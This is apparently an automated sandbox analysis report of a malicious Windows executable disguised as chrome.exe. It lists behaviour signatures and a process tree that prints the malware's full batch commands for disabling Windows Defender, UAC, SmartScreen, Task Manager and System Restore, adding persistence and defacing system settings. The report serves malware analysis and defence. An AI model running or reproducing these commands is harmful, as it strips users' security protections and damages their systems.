Resubmissions
02/04/2025, 19:18
250402-x1fajsvmt9 1022/03/2025, 04:45
250322-fdd1jaxzax 1022/03/2025, 04:32
250322-e5x22sxydw 1022/03/2025, 01:50
250322-b9qa8ayrs5 10Analysis
-
max time kernel
478s -
max time network
596s -
platform
windows7_x64 -
resource
win7-20250207-en -
resource tags
-
submitted
22/03/2025, 04:45
Errors
General
-
Target
chrome.exe
-
Size
4.1MB
-
MD5
d162022a4f77fe568e3644c8ddccfc91
-
SHA1
940b43d35e0bd31d108b5758339494e1b990ac21
-
SHA256
780044208370ddc653095749d6e17ba029364d169891c8fcf2ff10974e0800ab
-
SHA512
81db20a0cf1ba119769a86b1c24a1106a2a13c0dd4c42285128cd506c385e596466f5bafae196ec22187fbd729eb5167295b6d9850d04d92c1c67540bba8573e
-
SSDEEP
98304:bhmbefkYYSmghDECMUVXhxEt3/PGrcFEXdA+Sif2g07:bf8YbmGlhVmv+r1XyNi+g07
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 12 IoCs
-
Modifies Windows Defender notification settings 3 TTPs 6 IoCs
-
Modifies security service 2 TTPs 1 IoCs
-
UAC bypass 3 TTPs 3 IoCs
-
Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
-
Disables RegEdit via registry modification 1 IoCs
-
Disables Task Manager via registry modification
-
Disables cmd.exe use via registry modification 1 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
-
Modifies Windows Firewall 2 TTPs 7 IoCs
-
Possible privilege escalation attempt 8 IoCs
-
Sets file to hidden 1 TTPs 6 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Modifies file permissions 1 TTPs 8 IoCs
-
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Adds Run key to start application 2 TTPs 5 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Enumerates connected drives 3 TTPs 49 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Modifies Security services 2 TTPs 5 IoCs
Modifies the startup behavior of a security service.
-
Drops file in System32 directory 64 IoCs
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 64 IoCs
-
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Accessibility Features 1 TTPs
Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 24 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 2 IoCs
-
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Kills process with taskkill 2 IoCs
-
Modifies Internet Explorer settings 1 TTPs 7 IoCs
-
Modifies registry class 64 IoCs
-
Modifies registry key 1 TTPs 4 IoCs
-
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 40 IoCs
-
Suspicious behavior: SetClipboardViewer 14 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 46 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 48 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 6 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F6AE.tmp\F6AF.tmp\F6B0.bat C:\Users\Admin\AppData\Local\Temp\chrome.exe"2⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v sex.exe /d "C:\Windows\System32\sex.exe"3⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableTaskMgr /t REG_DWORD /f /d 13⤵
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg add HKLM\System\CurrentControlSet\Control\SafeBoot /v AlternateShell /t REG_SZ /d "C:\Windows\System32\sex.exe" /f3⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg add HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName /v "ComputerName" /t REG_SZ /d "NeoandRedV" /f3⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v "s1159" /t REG_SZ /d "Neo" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v "s2359" /t REG_SZ /d "Red_V" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v "sCountry" /t REG_SZ /d "United Red_V of Neo" /f3⤵
-
-
C:\Windows\system32\timeout.exetimeout 3 /nobreak3⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\control.execontrol3⤵
-
-
C:\Windows\system32\cttune.execttune3⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Windows\system32\DisplaySwitch.exedisplayswitch.exe3⤵
-
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v BatteryFlyout /t REG_DWORD /f /d 03⤵
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v HelpCustomized /t REG_DWORD /f /d 13⤵
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v Manufacturer /t REG_SZ /f /d "Neo, Red_V"3⤵
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v Model /t REG_SZ /f /d "YOU HAVE BEEN FUCKED"3⤵
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v SupportHours /t REG_SZ /f /d "NEO"3⤵
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v SupportPhone /t REG_SZ /f /d "NEO"3⤵
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation\ /v SupportURL /t REG_SZ /f /d "http://www.neocorporations.com"3⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\MTCUVC" /v EnableMtcUvc /t REG_DWORD /f /d 03⤵
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\devmgmt.msc"3⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo2.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo3.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo4.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo5.vbs"3⤵
-
-
C:\Windows\system32\dxdiag.exedxdiag3⤵
-
C:\Windows\SysWOW64\dxdiag.exe"C:\Windows\SysWOW64\dxdiag.exe"4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\diskmgmt.msc"3⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\SndVol.exeSndVol.exe3⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\player.vbs"3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender notification settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications " /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender notification settings
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender DisableAntiSpyware settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
-
-
C:\Windows\system32\sc.exesc config webthreatdefsvc start= disabled3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc config webthreatdefusersvc start= disabledreg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f3⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Edge\SmartScreenEnabled" /ve /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Edge\SmartScreenPuaEnabled" /ve /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t "REG_DWORD" /d "0" /f3⤵
-
-
C:\Windows\system32\takeown.exetakeown /s JXXXDSWS /u Admin /f "C:\Windows\System32\smartscreen.exe"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\smartscreen.exe" /grant:r Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\taskkill.exetaskkill /im smartscreen.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\CI\Policy" /v "VerifiedAndReputablePolicyState" /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\control.execontrol display3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL display4⤵
-
-
-
C:\Windows\system32\control.execontrol3⤵
-
-
C:\Windows\system32\control.execontrol system3⤵
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\joy.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\joy.cpl",4⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im explorer.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\msconfig.exemsconfig3⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\msinfo32.exemsinfo323⤵
-
-
C:\Windows\system32\OptionalFeatures.exeoptionalfeatures3⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\services.msc"3⤵
- Modifies Internet Explorer settings
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\slui.exeslui.exe3⤵
-
-
C:\Windows\system32\SystemPropertiesAdvanced.exeSystemPropertiesAdvanced3⤵
-
-
C:\Windows\system32\SystemPropertiesComputerName.exeSystemPropertiesComputerName3⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Windows\system32\SystemPropertiesDataExecutionPrevention.exeSystemPropertiesDataExecutionPrevention3⤵
-
-
C:\Windows\system32\SystemPropertiesHardware.exeSystemPropertiesHardware3⤵
-
-
C:\Windows\system32\SystemPropertiesPerformance.exeSystemPropertiesPerformance3⤵
-
-
C:\Windows\system32\SystemPropertiesProtection.exeSystemPropertiesProtection3⤵
-
-
C:\Windows\system32\SystemPropertiesRemote.exeSystemPropertiesRemote3⤵
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\WF.msc"3⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\lusrmgr.msc"3⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\winver.exewinver3⤵
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\joy.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\joy.cpl",4⤵
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\desk.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\desk.cpl",4⤵
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\ncpa.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\ncpa.cpl",4⤵
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\mmsys.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\mmsys.cpl",4⤵
-
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d 2 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideIcons /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoPinningToTaskbar /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetTaskbar /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayItemsDisplay /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayContextMenu /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSaveSettings /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileAssociate /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSecurityTab /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSecurityTab /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Command Processor" /v DisableUNCCheck /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f3⤵
-
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoClose /t REG_DWORD /f /d 13⤵
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\ /v legalnoticetext /f /d "ATTENTION!"3⤵
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\ /v legalnoticecaption /f /d "YOU HAVE BEEN SCREWED!"3⤵
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\sc.exesc config VSS start= disabled"3⤵
- Launches sc.exe
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\sysdm.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\sysdm.cpl",4⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
C:\Windows\explorer.exeexplorer.exe3⤵
- Boot or Logon Autostart Execution: Active Setup
- Drops desktop.ini file(s)
- Checks processor information in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\timedate.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\timedate.cpl",4⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
C:\Windows\system32\mmc.exemmc.exe3⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\appwiz.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\appwiz.cpl",4⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\main.cpl",3⤵
-
